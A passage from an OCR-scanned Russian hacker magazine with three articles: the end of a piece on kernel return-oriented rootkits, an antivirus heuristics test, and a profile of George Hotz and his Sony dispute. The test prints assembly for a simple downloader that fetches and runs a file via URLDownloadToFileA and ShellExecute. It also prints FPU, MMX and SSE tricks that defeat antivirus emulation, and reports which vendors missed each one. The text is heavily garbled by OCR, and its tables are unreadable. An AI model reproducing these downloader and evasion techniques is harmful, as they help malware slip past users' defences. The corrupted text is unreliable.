Во-первых, эксплойт может перезаписать весь стек ядра нашим 
кодом, однако стек не резиновый, и в него может влезть (в 
случае ѴѴіпсІоѵѵз) всего три страницы, то есть 12 Кб. Во-вторых, 
эксплойт должен (по крайней мере, на начальном этапе выпол- 
нения) постараться продержать имидж самой программы в 
пользовательском режиме. Для решения этой проблемы иде- 
ально будет написать загрузчик нашего будущего руткита. Но об 
этом — чуть ниже. 

Подводные камни 

Их тоже полно. Одно из главных препятствий, возникающих на 
пути реализации возвратно-ориентированного руткита, — то, как 
ѴѴіпсІоѵѵз манипулирует своим ядерным стеком. Все существую- 
щие версии ѴѴіпсІоѵѵз используют в ядре так называемые уровни 
запросов прерываний ( I РОЕ), являющиеся настоящей головной 
болью для системных разработчиков, пишущих драйвера. Если 
ты не знаешь, что такое ІРС!І_, то совсем уж вкратце — это меха- 
низм приоритетов в ядре, весьма похожий на уровень приорите- 
та потоков в юзермодных программах. 

У каждого прерывания есть свой заранее определенный уро- 
вень. Когда возникает прерывание, то в первую очередь осу- 
ществляется сравнение с уровнем I РОЕ, который имеет текущий 
поток. В случае, если новое прерывание обладает более низким 
I РОЕ, исполнение программного кода от нового прерывания 
ставится в очередь до лучших времен — новое прерывание 
хода исполнения программы не может его заморозить, если 
оно ниже по уровню. Для грамотного читателя все это, конеч- 
но, не новость. Но самое интересное при этом происходит при 
попытке доступа к подкачиваемой памяти (то есть той, которую 
ядро периодически сбрасывает на жесткий диск), поскольку 
это имеет определенные последствия. Главное, что следует 
уяснить — доступ к подкачиваемой памяти сильно ограничен 
на высоких ІРОБ'ах, и при реализации кода это приводит к про- 
блемам (читай — ВБОБ'ам). Ведь всякий раз, когда происходят 
прерывания (и, следовательно, они должны быть обработаны 
ядром ѴѴіпсІоѵѵз), ядро, как правило, начинает оперировать со 
стеком. При этом обработчик прерывания выделяет память ниже 
текущего значения Е5Р, нежели обработчик стека. И хотя такое 
поведение ядра вполне приемлемо в общей ситуации, в нашем 
случае это может привести к нежелательным последствиям, 
поскольку значения стека, находящиеся ниже текущего ЕБР, 



могут серьезно подпортить выполнение кода руткита. Решить 
эту проблему, как я говорил ранее, довольно просто — для этого 
нужен загрузчик. Можно сделать так: загрузчик должен выде- 
лить память в неподкачиваемом (попрадеб) пуле, который никог- 
да не сбрасывается на жесткий диск, и скопировать туда тело 
руткита из пользовательского пространства перед тем какой 
будет запущен. При этом, заметь, имидж находится в пользова- 
тельском пространстве, что ограничивает способность механиз- 
мов защиты ядра запретить загрузку нашего руткита. 

Когда общий ход выполнения программы захочет вернуться из 
некоей подпрограммы, это может привести к краху, поскольку 
есть вероятность того, что точка возврата перезаписана обра- 
ботчиком прерывания. Чтобы избежать таких проблем, нужно 
также предусмотреть некую опцию динамического восстанов- 
ления «поврежденного» участка кода, но уж это остается тебе в 
качестве домашнего задания. 

Кроме того, если в стеке попадутся адреса из подкачиваемой 
памяти, не избежать проблем с ІРСИ, что неминуемо приведет к 
«синим экранам». 

Это проблема решается использованием функции ѴИиаІБоск, 
которая позволит залочить в памяти определенное количество 
страниц процесса и не даст ядру скинуть эти страницы на диск. 
Однако, по неизвестным для меня причинам, это ноу-хау не 
всегда работает с областями памяти размером больше одной 
страницы. 

Оффтоп 

Большинство уязвимостей, возникающих из-за неправильной 
обработки данных, которые драйвер получает в ІРР-запросе, 
довольно однотипны, и мы уже не раз о них писали. Знающие 
люди говорят, что некорректная обработка входных данных не 
является разовым явлением и, найдя одну уязвимость, можно с 
большой вероятностью найти и другую, проследив либо общий 
ход выполнения программы, либо другие участки программ- 
ного кода, выполняющие аналогичную задачу. С такой зада- 
чей хорошо справляется утилитка І0СТ1_ Еиггег ( собе.доодіе. 
сот/р/іосШиггег ). действие которой заключается в генерации 
и отправке заведомо некорректных входных данных с расчетом 
на то, что код, который их обрабатывает, попросту не учитывает 
возможность присутствия подобных некорректностей. 

На самом деле, таких уязвимостей переполнения буфера, 
которые можно заэксплойтить при помощи фич возвратно- 
ориентированного кодинга в сторонних драйверах, вагон и 
маленькая тележка, т 
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I Сергей Греков 




ВЗРЫВАЕМ 

ЭВРИСТИКУ 

№ іе методы. обхода эвристики Зутапіес, 
иТгепоМісго 

о Сегодня мы представляем на твой суд тест эвристических защит со- 
временных антивирусов. Причем не просто антивирусов, а настоящих 
лидеров мировой индустрии в области информационной безопасности 
и шаіѵѵаге-детекта. Проверим на деле, чего стоит их лидерство. 



Кстати, а кто же они, эти лидеры? Посмотрим отчет аналитиче- 
ской компании ЮС за 2009 год. Увы, более актуальные данные 
пока (на момент написания статьи — конец февраля) отсутству- 
ют. В соответствующей таблице мы немного модифицировали 
оригинальный отчет, заменив в последней колонке рост за 2008- 
2009 годы на долю мирового рынка. Итак, из таблицы видно, что 



Зуппапіес и МсАіюе держат больше половины рынка. 

Вот их мы и протестируем в первую очередь. Кого еще? Вот, 
например, третье и пятое место — Тгепб Місго и Зорбоз. 
Причина проста — мне так хочется! Шучу-шучу. На самом деле, 
краш-тесты этих антивирусов лично мне на глаза давно не попа 
дались. 



► 076 
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От редакции 

Александр Лозовский, редактор рубрики 

С давних времен бытует миф о том, что запрятать 
отэвристики прогу, написанную на ассемблере, не 
так просто. Лаборатория ][ проверила это утверж- 
дение. Результаты традиционно плачевные — наш 
даунлоадер в первозданном виде был детектиро- 
ван едва ли половиной антивирусов, представ- 
ленных на ВирусТотале. Что уж говорить о более 
извращенныхтестах? Да, моеувлечение ВирусТо- 
талом можно подвергнуть справедливой критике 
— ведь на этом сервисе тусуются антивирусы с 
несколько устаревшими движками (кажется, это 
было сделано как раз для того, чтобы снизить по- 
лезность сервиса для вирмэйкеро в). 

Тем не менее, общую картину эта проверка дает. 
Разумеется, в тесте, проведенном нашей лабора- 
торией, были использованы самые последние 
версии указанных антивирусов — с самыми новы- 
ми движками и самыми свежими базами. Впро- 
чем, базы тут не причем.Всесорцыибинарники, 
описанные в статье, ты можешь найти на нашем 
диске. Да, кстати, не спеши удивляться, если у 
тебя ВирусТотал или твой домашний антивирус 
будут давать несколько лучшие результаты — к 
моменту попадания журнала в твои руки антиви- 
русные конторы уже могут принять меры. 



Поехали! 

В качестве конкретных продуктов я использовал 
топовые решения каждой компании: 

• Бутагѵбес - І\Іог1:оп Ігѵбегпеі: Бесигі-бу 2011; 

• МсА-Рее - МсА-Рее То1:а1 Рго-бесбіоп; 

• ТпепсІ Місго - Ті-бапіит Махітит Бесигі-бу; 

• Борбіоз - Епсіроіігб Бесипіііу апсі Оа-ба 

Рго-беобіоп . 

Как я уже упоминал, тестировать мы будем важней- 
ший компонент любого антивируса — эвристическую 
защиту. Методология довольно простая: я скачивал 
пробную версию каждого продукта, выставлял «мак- 
симальные» настройки (чтобы все было честно), а 
затем сканировал каждый из пяти файлов. А теперь 
поподробнее о файлах. 

В этом краш-тесте я решил проверить, как обстоят 
дела у наших подопытных с эмулированием инструк- 
ций РРІІ, ММХ и 55Е. Ниже будут приводиться 
интересные фрагменты программного кода файлов, 
использованных в тестировании (полные листинги ты 
найдешь на нашем 0Ѵ0). Для начала я сделал про- 
стенький Ооѵѵпіоасіег на ассемблере. В качестве ком- 
пилятора выступал та5т32ѵ10. Все довольно просто 
и очевидно: 

5 Іагі: : 

ризЬ 0 

ризЬ 0 

ризбі о-р-Рзе-б Ра-ббіТоБаѵе 

ризЬ о-р-Рзе-б Таг§е1:ІІКІ_ 



Компания 


Доход 

($М 115 СААР) 


Доля рынка, % 


Зутапіес 


2360 


35,76 


МсАІее 


1191 


18,05 


ТгепсІ Місго 


596 


9,03 


Кб 


380 


5,76 


ЗорЬоз 


203 


3,08 


АѴВ 


190 


2,88 


Е5ЕТ 


160 


2,42 


ГЗесиге 


150 


2,27 


ВіШеТепгіег 


140 


2,12 


Рапсіа 


132 


2,00 


ОіНег 


1098 


16,64 


Тоіаі 


6600 


100,00 



Аналитический отчет ЮС по доходам антивирусных вендоров за 
2009 год 



ризЬ 0 

саіі ІІКбОоіл/пІоасІТоРіІеА 

риз И 0 
риз И 0 
риз И 0 

ризЬ о-р-Рзе-б Ра-ббіТоБаѵе 
ризЬ о-р-Рзе-б 0реп51:гіп§ 
ризЬ 0 

саіі БНеІІЕхеси-бе 
риз И 0 

саіі ЕхііРгосезз 

Этот фрагмент кода загружает файл из интернета 
при помощи АРГшки I) Р Ю оѵѵп Іоа сІТо Рі ІеА, а затем 
запускает его при помощи ЭбіеІІЕхесиІе. Казалось 
бы, такой простейший «вирус» должны детектиро- 
вать все, однако оказалось, что это не совсем так: 
великий и ужасный Ыогіоп I пбегпе! Эесигііу 201 1 не 
посчитал этот примитив за вирус. Впрочем, он ока- 
зался единственным — все остальные антивирусы 
справились успешно и обнаружили «угрозу». 

Затем я решил слегка усложнить задачу, заменив 
прямой вызов АРІ-функций через импорты на сле- 
дующую последовательность действий: получение 
адреса библиотеки с помощью ЕоасНіЬгагу, полу- 
чение адреса функции с помощью ОеіРгосАсІсІгезз, 
дальнейший ее вызов через саіі гед. Получилось 
примерно так: 



з* а гб : 




ризбі о-р-Рзе-б игІтопБ-бг 
саіі боасІбіЬгапуА 


л 


ризбі о-р-Рзе-б сіоитіоасі-рипс 
ризН еах 

саіі Се-бРгосАсІсІгезз 


> СІѴСІ 


ризбі 0 


Исходники и бинарни- 


ризИ 0 


ки ждуттебя на нашем 


ризбі о-р-Рзе-б РаІіІіТоБаѵе 


диске. Вперед, кэкс- 


ризбі о-р-Рзе-б Таг§е1:ІІКІ_ 


периментам! 
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МАІЛЛ/АРЕ 



~ІМ|ТЦ 






■іиі-ІѴ. 


1.4.3,'" 


23 11 .41. 21 


1*1 п 


і-й.еш.е 


2Н1.44-.11 


ІЯПІ 


1.4.ІТТ.1 


2311.11.22 


Р7 




ШШМіІІ 




ТнІ 


ІЕІІгІІпІІ 




ІЧ-гЯ 


тнл 


ПмШГ 




ішегтр 




МіІЗіІ 


ІШгІМІ 


ЫЛтЛя 




1311.12.11 








ЬпнП 


Ш4 


№441 


« ГіРі 


14>іи 


2ІЦ-І?-» 


ГІТШ'^П 


М4-ЦН 




І'ІПІ 


М4-М1 


нц.іи) 


Іі'кіип 






Гпіні 


1.1-33-Ц- 


2321-12.23 


ЩкМ 


п 


ЯН~№П 


1+1 м 




пилі.іі 




ц г :.м 


Ш^І.Н 




мм»»: 


шшіХі 


Р+НгЧІІГ-і 


М.МГІ 


т\.ц 




мк.ТгНИ 


ІШМ& 




ті.к 


ІШіІГІІ 


ЯІНМІ 


ІЧ«М 


1№ Г 1М1 


ЧЩ 


М-м 


ти«4і 


■ігчч 




ІШгЧ-11 


шЩцясц 


ліі->Цгн-±№ 


1Ш4І41 


Ічл-щ 




43Н-Н-І1 


Кініі 


М4.і 


2341.11.23 


Гщяшя 


м 


2111.41.22 


КдИ 


31.11 .Н. ЕС 


4МЛ1-+1.12 


№ 


Ф_и.в 


2 3 31. ЕЗ. 13 




кІІ.МЖ 




^■МЛп 


МгМьІН 


ШДІііі 






1НШ,Н 




МН.ТіІШ 


ІІЧІгІГН 









■ із г Ымпи#|4И ь , |1іИЦТ4 



ш региьея ті ЬііІ. Зтеіідімъі г*мт. Еаі г-^ІІ 1 



*ЧЧ“ іглм ГьЬг 



3 гс] Іряяз - Еы 



Первый тест. Все довольны — 21 из 42-х антивирусов 
распознали угрозу 

ризИ 0 
саіі еах 

ри зИ о-р-рзеі: зЬе11325і:г 
саіі І_оасІІ_іЬгагуА 

ризЬ о-р-РзеІ: ехесиІіе-Рипс 
ри зИ еах 

саіі СеІіРгосАсІсІгезз 

ри зИ 0 
ризЬ 0 
ри зИ 0 

ри зИ о-р-рзеі: Раі:ІіТо5аѵе 
ри зИ о-р-рзеі: 0реп5і:гіп§ 
ризЬ 0 
саіі еах 

ри зИ 0 

саіі ЕхіііРгосезз 

Что же в результате? С этим «чудовищным троянским конем» 
справился только ЗорЬоз. Тройка лидеров отдохнула. 

Отлично, идем дальше. Добавим в код последнего «вируса» про- 
верки, связанные с использованием инструкций РРІІ-набора. 

зііа гі: : 

хо г еах, еах 
бпіі: 





зшгогн;:: 


Ы117Ы.ЗТ 


- 


іЬиЧе 




НІ1.ЫЛІ 




ашдоп 


Э-П.З-Т 


Г331.М.13 


- 


лѴІП 


4.І.1ІІ1.» 


НІКЫ.Н 


* 






НІІгКгН 


* 


гп 


ір.ф.п.іеи 


2 >333 . ЕІ. 7-3 


ЗШМк.НШ 


І1І4ІВКІ 


7.1 


П11.Н.Н 


Лиш .ІІІІ+ІП.ІЛ' 1 .«1ГІП 




11+М 




- 


:іім7 


к.Кі.1 


газ.Н.із 


- 


2штк 


3.2.32.1 


3333 .Е'2. 1.-3 


- 




ш 


Мкі.ы.ы 


" 


им 


МіУНІ 


НкЭ.НгН 


- 


ШІпЗІ 


1.1.С-.І 


іш.-и.ій 


- 


■ і 12 + 


1.4.11.1 


Піі.и.и 


- 


іТГПі:-Ѵіт 


4«.|.*ітд- 


ні^гігіі 


-к 


Г-ІЫІ 


4.ІАШ 


1Ш1.И.Ш 


-■ 


1-1 кич 


і-.киія-.і 


Ж1.К.Н 


$*ыш ,!Н> 1 П ,Гш4 - 1 ,»1ІПП 


Йиин 




РЩ.Е*.П 


* 


Ійш 




ГЗЗЗ.ЕІ.ГЗ 


этапе іі імт-* .>іза- ! гтші’зп: 


Глжжпж 


ИМ.ПЛ 


изі.еч.н 


- 


Зі ■ и р ч ■. 




Юі.ы.п 


- 


ЩМІ'ІІЕЧІ 


1.*МІМ 


Нкі ■ Н-1Р 


- 


Елпчіік-д 


зл 


3 Я 33. К. 34 


- 


шин 


І.кН.Е.ІНІ 


Н11.П.Н 


* 


ьі13иіт1К-Еяі:|.=г, 


■Н», 25 


НІМІ-Н 


* 


іізіін[і 


І.НЫ 


7333 . М. І-З 


тга}ізкам±мод: : чш^иа!: т 


ОН 


111! 


ніі.к.н 


+ 


Л22Ы2 




ЛІІіЛФ 


+■ 


1ІЕЕ14СЕ 


Кіі>4ІУІР,«1 


НІ1.М.1І 




І-ьиі 


И+М 


НЗЭ1.Н.ЕЗ 


- 


КІНІЙ 


7.І.І.І 


ИЦ.Ы.И 


* 


Гяч 


і.< 


ПІІгН.П 




1ІІІХ} 


Э1.І1.Н.Н 


1331. ЕІ. 31 


- 


В*ры* 


1.0.1 


П11.Н.Н 


ПІІ іТТіѴТ 1Г 


ОЕи.-з ] ^^ф 


МкЬИИ 


паЧгИ-я 


* 


ЦЬйШ 


ЗПІЗ . 3.1.1-13 


аэіз.Е-х.гз 


- 


ПзЕішг 


!*■ 


Н31.И.Н 


+ 



► 078 



Пятый тест. Народ явно не справляется! 

ризН 0 
ризИ 1 

ЛсІ яи/опсі рТг [езр] 
тоѵ сЫогсІ рі: г [езр], 0 
тоѵ сЫогсІ рі: г [езр + 4], 0 
Тзі: яи/опсі рі :г [езр] 
тоѵ еах, [езр] 

-Іезі: еах, еах 
3*2 Ехіі: 

Суть этой проверки чрезвычайно проста. Вначале в стек вно- 
сятся два двойных слова — 0x00000000 и 0x00000001. Далее в 
регистр 8Т0 сопроцессора из памяти вносится учетверенное 
слово по адресу, который содержит регистр Е8Р. Таким образом, 
регистр 8Т0 содержит ненулевое значение. Затем с помощью 
двух МОѴ’ов содержимое памяти по [Е8Р] и [Е8Р+4] обнуляется. 

А теперь — самое последнее и самое главное: ОѴѴОРО из 8Т0 
копируется в память по [Е8Р], и полученное значение по [Е8Р] 
копируется в регистр ЕАХ. Антивирус обязан правильно обра- 
ботать все инструкции, иначе финальная проверка ТЕЗТ ЕАХ, 

ЕАХ будет выполнена некорректно. Если просто пропускать все 
ЕРІІ-инструкции, то в регистре ЕАХ окажется ноль и произойдет 
вызов ЕхііРгосезз. 

Однако хитрый Зорбоз справился и с этим тестом. Тогда я решил 
использовать редко встречаемые ММХ инструкции. 

зііапі: : 

хог еах, еах 
тоѵц ММ0, (ДООКО_ѴАІ_ 
ризЬ 0 
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АѴ-вендор 


5ітрІеОо\л/п- 

Іоасіег 


6РА Ооѵѵпіоасіег 


©РА Эоѵѵпіоасіег 
+ РРІІ 


6РА Эоѵѵпіоасіег 
+ ММХ 


6РА Ооѵѵпіоасіег 
+ 55Е 


Зутапіес 


- 


- 


- 


- 


- 


МсАТее 


Ооѵѵпіоасіег-АЕ 


- 


- 


- 


- 


ТгепсІМісго 


МАЦН.0ЕК 


- 


- 


- 


- 


ЗорНоз 


Тгоі/Арііег-Рат 


МаІ/РоѵѵпЫг-АС 


МаІ/ОоѵѵпЫг-АС 


Ма1/0<мпЫг-АС 


МаІ/РоѵѵпЫг-АС 



Неутешительные результаты нашего теста 




ризИ 0 

тоѵд дмогб р-Ьп [езр], ММ0 
тоѵ еах, [езр] 

■Ьезі: еах, еах 
32 Ехіі: 

Здесь используется аналогичная предыдущему файлу проверка. 
Разница лишь в том, что вместо РЮ и Р5Т используется толь- 
ко инструкция МОѴО. Все остальное — абсолютно идентично. 
Однако и здесь Епброіпі Эесигііу апб Оаіа Ргоіесііоп показал 
себя с лучшей стороны, не пропустив «вредоносное ПО» на ком- 
пьютер. Что же, обидно, что этот антивирус все никак не сдает- 
ся... А раз так, то применим тяжелую артиллерию — инструкции 
набора 55Е. 

0(2ІлІ0РШ_ѴАІ_ сІЬ 0-р-РЬ, 0-р-РЬ, 0-р-РИ^ 0-р-РИ^ 0-р-РИ^ 0-р-РЬ, 0-р-РЬ, 
0-Р-РИ , 0-Г-РН , 0-Р-ЕИ , 0-Р-РИ , 0-Р-РИ , 0-Р-РИ , 0-Р-РИ , 



0-р-РИ 0-р-РИ 
з±аг±: 

хоп еах, еах 

тоѵ есх, о-р-Рзе* 0(2ІлІСЖ0_ѴАІ_ 

сІЬ 00-РЬ , 10Ь, 01Ь 
сІЬ 00-РЬ , 50Ь, 0с0Ь 

Ііезі: еах, еах 
3*2 Ехі-р 

Внимательный читатель, наверное, сразу же задастся вопросом: 
«А что это за 6Ь ООбЬ ... в коде? Где же инструкции?». Отвечаю: 
дело в том, что пла5пп32 (компилятор ассемблера от МісгоЭоіЧ) 
последней, десятой версии, просто не знает таких мнемоник, 
которые я хотел использовать. На самом деле — это инструкции 
М0ѴІІР5 ХММО, [ЕСХ] и М0ѴМ5КР8 ЕАХ, ХММО. Я уверен, что 
подавляющее большинство людей, работающих с ассемблером 
и машинными командами, никогда в жизни таких инструкций не 
видели. Что же они делают? 

Команда М0ѴІІР5, по сути, просто копирует данные. Я, конечно, 
мог обойтись только копированием данных, как я это и делал 
в предыдущих примерах, но мне хотелось сломить нашего 
оставшегося стойкого оловянного солдатика. Для этой цели я 
использовал команду М0ѴМ5КР5, которая расшифровывается 
как Ехігасі Раскеб Эіпдіе-Ргесізіоп Еіоаііпд-Роіпі 5ідп Мазк. Эта 
инструкция берет знаки четырех ОѴѴОРО’ов, входящих в ХММ- 
регистр, и кладет их в приемник, зануляя старшие двадцать 
восемь бит (32-битный режим). 

И что же? Я достиг результата... Правда, ЭорЬоз все равно ока- 
зался «крепким орешком» и выдержал даже это испытание. 

На этом краш-тест закончен. Пришло время подвести итоги 
— все данные по срабатываниям антивирусов я расположил в 
одной сравнительной таблице. 

Заключение 

Что же получается? Эвристические алгоритмы лидеров мирового 
антивирусного рынка задетектили примитивную ассемблерную 
малварь, но любой шаг в сторону вызвал у большинства из них 
сильные затруднения. В этом смысле приятно удивил ЭорЬоз, 
обнаруживший все «угрозы». По-видимому, либо в нем исполь- 
зуется аппаратное ускорение, перекладывающее эмуляцию кода 
на процессор, либо у них есть команда классных разработчиков, 
которая добавила даже эмуляцию М0ѴМ5КР5 :]. 

Конечно, наш тест не претендует на стопроцентную объектив- 
ность, но ясно одно: не так важно, насколько широко АѴ-вендор 
представлен в мире или раскручен — с эффективностью защиты 
пользователя это не коррелирует, т 
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БеоНоІ ѵ$ Зопу 

Один против корпорации 

ѳТы уже наверняка слышал о противостоянии, что развернулось 
между известным хакером беоНоГом и компанией 5опу, чью супер- 
защищенную приставку (РІауЗІаІіоп 3) он взломал. По сути, ВеоНоі 
сейчас в судебном порядке отстаивает право всех исследователей 
ломать свои смартфоны, консоли и другие гаджеты, если им того за- 
хочется. 



Краткая биографическая справка 

Чтобы разобраться в этой запутанной истории, сначала нужно 
понять, кто такой беоНоІ, и чем он знаменит. 

Имя и никнейм нашего героя ты мог неоднократно встречать на 
страницах журнала, но подробно о нем мы не рассказывали ни разу. 
Кажется, пришла пора это исправить. Сейчас ему всего 21 год, он 
родился 9-го октября 1989 года в США, в городе Глен Рок. В Сети 
и за ее пределами он известен как Джордж Фрэнсис Хотц, беоНоС 
тіШоп75 или же просто тіГ Невзирая на свой, в общем-то, юный 
возраст, Хотц успел достигнуть многого. Если говорить об образова- 
нии, то небезынтересен хотя бы тот факт, что СеоНоІ — выпускник 
Центра талантливой молодежи при Университете Джона Хопкинса. 
Слава пришла к Хотцу задолго до того, как он вплотную занялся 
джейлбрейком. Еще в начале 2000-х он успел отметиться на І5ЕЕ 
— Іпіеі Іпіегпаііопаі Зсіепсе апб Епдіпеегіпд Еаіг. Это престижное 
соревнование для студентов и школьников, на котором они пред- 
ставляют свои научные проекты. Впервые Джордж участвовал в 
І5ЕЕ в 2004 году с проектом «ТЬе Марріпд РоЬоІ». С первого же 
раза он вошел в список финалистов, в результате чего засветился 
на ТВ, дав интервью Ларри Кингу в мегапопулярном на Западе 
«Тобау ЭЬоѵѵ». На следующий год успех повторился, на этот раз Хотц 
сорвал овации с проектом «ТЬе Соодіег». 

Судя по фотографиям (да и просто исходя из названий) нетрудно 
догадаться, что все проекты СеоНоГа были связаны с робототехни- 
кой, которая Хотцу и по сей день очень интересна. И этот интерес 
возник совсем не вдруг — еще в школе Джордж входил в состав 
команды Тііапіипп КпідЫз, которая занималась боевыми ботами. А 
на досуге вундеркинд возился с проектом «Ыеигорііоі» — разработ- 
ка представляла собой девайс, основанный на железках ОрепЕЕС- 
проекта, и эта штука могла считывать ЭЭГ-волны человеческого 
мозга. Джорджу удалось снискать признание публики на І5ЕЕ и в 
третий раз — в 2007 году. Его очередной проект «I ѵѵапі а Ноіобеск» 
заработала сразу несколько призов в разных категориях, и заняла 
топовые места. Успех обернулся не только денежным эквивалентом 
(за самые интересные проекты Іпіеі и Ко платят молодежи неплохие 
деньги), но и пристальным вниманием прессы. За эти годы наш 



герой успел побывать в эфире почти всех крупнейших телеканалов 
(Еох, ОМЫ, ЫВС, СВ5, 64, АВС, СЫВС, ВВС), дать интервью многим 
ведущим мировым СМИ (например, ЕогЬез) и выступить на различ- 
ных ІТ-конференциях. Словом, нет ничего удивительного в том, что 
уважаемый журнал РС ѴѴогШ включил имя Джорджа Хотца в топ-10 
самых перспективных учеников младше 21 года. 

Вскрытие яблочных продуктов 

Ценные призы и умиление со стороны СМИ Джорджа, очевидно, не 
прельщали. От перспективных конкурсов для талантливой молоде- 
жи он перешел к вещам менее законным и куда более скандаль- 
ным. Признание в среде андеграунда и широкая (более того — уже 
мировая) известность пришли к нему в 2008-2009 годах, когда 
он джейлбрейкнул первый іРЬопе от Арріе, написав Ыаскгаіп и 
ригріегаі п. 

Этот поступок снова привлек внимание прессы и общественности 
к молодому (тогда 17-летнему) хакеру, что ему, судя по всему, при- 
шлось по душе. И дело было даже не в том, что он писал полезный, 
но не слишком легальный софт (напоминаем — тогда поправки в 
йМСА еще не внесли, и джейлбрейк не был одобрен законом :)), 
просто время от времени Хотц также выдавал в своем блоге длин- 
ные тирады о Правильном Хакерстве. Например, он крайне эмоцио- 
нально писал о том, что настоящие хакеры (то есть он сам и парни 
из йеѵ Теат, Іб8зп0\л/ и сбгопісбеѵ) не берут денег за свои програм- 
мы, а те, кто поступает иначе — просто сволочи. Или, скажем, резко 
осуждал пиратство. Увы, на данный момент старый блог СеоНоПа 
закрыт и подтерт, так что придется обойтись без ссылок и поверить 
нам на слово. 

Заметим, кстати, что джейлбрейк іРЬопе (а впоследствии и Р53) 

— дело рук не только Джорджа лично. Хотц вообще-то работал в 
команде, просто у его коллег не наблюдалось такой острой тяги к 
общению с прессой, длинным рассуждениям об этике хакерства и 
тому подобным вещам. Сам Джордж о своих «боевых товарищах», 
впрочем, не забывал. К примеру, тот самый первый взломанный 
іРЬопе он отдал для исследований Тери Дитаборну, основателю 
компании Сегбсеіі, в обмен на ІМіззап 3502 и три новых іРЬопе 8 ГБ. 
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СеоНоі на выставке І5ЕР в 2007 году 

Полученные смартфоны ОеоНоІ раздал помогавшим ему друзьям. 

И все, пожалуй, шло бы хорошо — Арріе выпускала бы новые про- 
дукты, Хотц и компания — взламывали их, публика — продолжала 
их любить, в Арріе — скрипели зубами, и все были бы счастливы. 
Только вот после релиза Ю5 4.0 Хотцу все это начало надоедать. 
Летом 2010 года он написал в Твиттере, что собирается покинуть 
сцену, так как джейлбрейк ему наскучил, люди воспринимают все, 
что он делает, чересчур серьезно, а для него это лишь способ скра- 
сить время. Страждущим он посоветовал обратить внимание на 
«конкурирующий продукт» — утилиту Брігіі, также предназначенную 
для джейлбрейка «яблочной» техники. 

Однако многие могли расценить этот ход как позорную капитуляцию 
— мол, не вышло у Хотца разлочить іРЬопе 4, и тут же началось: «я 
устал, я ухожу». От такого поворота событий ОеоНоІ застраховался 
просто — он заранее, еще до объявления об уходе, заявил, что 
готовит джейлбрейк для Ю5 4.0 и обещал представить его публике 
в обозримом будущем. Скептиков, конечно, нашлось немало — 
злые языки утверждали, что на этот раз у «юного гения» попросту 
нет решения, вот он и тянет время, но Хотц свое слово сдержал. 

В октябре 2010, как только в Сети появилась утилита ОгеепРоізОп, 
вскрывавшая наконец-то ІРЬопе 4, Хотц, якобы отошедший от дел, 
вдруг дал о себе знать, выпустив свою прогу Іітегаіп. 

Релиз явно был собран в некоторой спешке, так как Іітегаіп вооб- 
ще не работал для 305-девайсов и ощутимо бажил на остальных. 

Но мелкие технические косяки были делом поправимым — куда 
хуже то, что ОеоНоІ, по сути, подставил коллег по цеху, и, как многие 
тогда писали, нанес вред всему іКомьюнити. 

Об этой ситуации мы уже рассказывали довольно подробно, но все 
же напомним: парни из Оеѵ-Теат обнаружили, что девайсы на базе 
Арріе А4 имеют уязвимость в Ьооігот. Они радостно всех заверили, 
что скоро выпустят джейлбрейк, и всем будет счастье. Ведь чтобы 
пофиксить дырку в Ьооігот, Арріе придется перекапывать аппа- 
ратную часть устройств, а это дело небыстрое. Но планы Оеѵ-Теат 
оказались сорваны, и виной тому — не кто иной, как Джордж Хотц. 
Он также выпустил свое средство для джейлбрейка аппаратов с 
Ю5 4.0 и 4.1 — Іітегаі п. Вся соль ситуации заключалась в том, что 
Іітегаіп тоже использовал дырку в Ьооігот, только другую. Наш 
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Рэп-обращение Хотца к компании 5опу собрало уже 
более 1 500 000 просмотров 



герой нашел вторую уязвимость и не стал утаивать ее от обще- 
ственности. И хотя детище Хотца вышло в бета-версии, глючило 
(было замечено исчезновение иконок Арр Зіоге, Марз, ОатеСепІег 
и Саіепбаг, вернуть которые не удалось даже процедурой восста- 
новления), коллеги-хакеры все равно были в бешенстве. Еще бы, 
ведь если Арріе будет обладать информацией об обоих эксплойтах, 
то сможет закрыть оба одним махом! Таким образом, перед осталь- 
ными джейлбрейкерами планеты встал нелегкий выбор: либо при- 
держать свои разработки и подождать, пока Арріе закроет дыру, 
используемую Хотцом, либо публиковать все без оглядки, давая 
Арріе возможность залатать все уязвимости одним махом. 

ѲеоНоІ’а случившееся, похоже, не особенно взволновало (или, 
что более вероятно, он рассчитывал именно на такой эффект). В 
течение нескольких дней он довел до ума свой релиз, выпустив 
последнюю версию РСІЬ, и спокойно (подозреваем, что с чувством 
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Скриншот еще загадочного и пустого сайта Іітегаіп 




К вниманию публики Хотцу не привыкать 




Интервью, чтение лекций и тому подобные вещи хоро- 
шо знакомы СеоНоІ'у 

выполненного долга) отошел от «яблочных» дел. На этот раз, похо- 
же, насовсем. По крайней мере, с тер пор Хотц больше не принимал 
активного участия в жизни Арріе-комьюнити. 

Вз/іом Р53 и разбирательство 
с 5опу 

Без достойного вызова жизнь скучна, а когда ты умен и талант- 
лив — скучна вдвойне. Перспектива вернуться к студенческим 
олимпиадам и конкурсам, попробовав «запретный плод» извест- 
ности, видимо, не слишком радовала ѲеоНоі’а. Тем более, что 
Рочестерский Технологический Институт, в который ему удалось без 
проблем поступить, Джордж вскоре после громкого взлома іРЬопе 
бросил, не проучившись там и года. Новую планку Хотц поставил 
себе еще в конце 2009-го — тогда он опубликовал в своем блоге 
запись, озаглавленную «А Реаі СЬаІІепде» («Настоящий вызов»), 

В посте он сообщил о намерении низвергнуть защиту Зопу 
РІауЗіабоп 3, которая давно являлась эталоном стойкости. Взлом 
должен был быть чисто программным — разного рода ІІБВ-донглы, 
при помощи которых ломали РІауЗіабоп 2, хакера не интересовали. 
ѲеоНоІ тщательно документировал в блоге свои достижения, и уже 
пять недель спустя (22 января 2010 года) объявил о том, что цель 
достигнута. Дело в том, что при желании на Р53 можно запустить 
Біпих, который, в свою очередь, работает под управлением гипер- 
визора. Хотцу удалось получить доступ к гипервизору после запуска 
Біпих в режиме «ОібегОЗ». Он использовал эксплойт, чтобы доба- 
вить несколько функций произвольного доступа к памяти на чтение/ 
запись, а также для получения дампов гипервизора. Дальше в ход 
пошел глитчинг памяти и — вуаля! 26 января, опубликовав в блоге 
все подробности о проделанной работе, ОеоНоІ заметил: «У Зопу 
могут возникнуть трудности с пропатчиванием эксплойта». И не 
угадал. В Зопу подошли к решению проблемы не слишком изящно, 
но эффективно — выпустили новую версию прошивки, из которой 
исключили функцию «ОібегОЗ». Кстати, в Зііт-версии консоли эта 
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Это предупреждение — все, что осталось от сайта 
группы РаіІОѵегЯоѵѵ 



функция отсутствовала уже давно. Хотц не только не растерялся, 
но заинтересовался еще больше — ведь это уже действительно 
был вызов! В блоге он заявил, что теперь будет разрабатывать соб- 
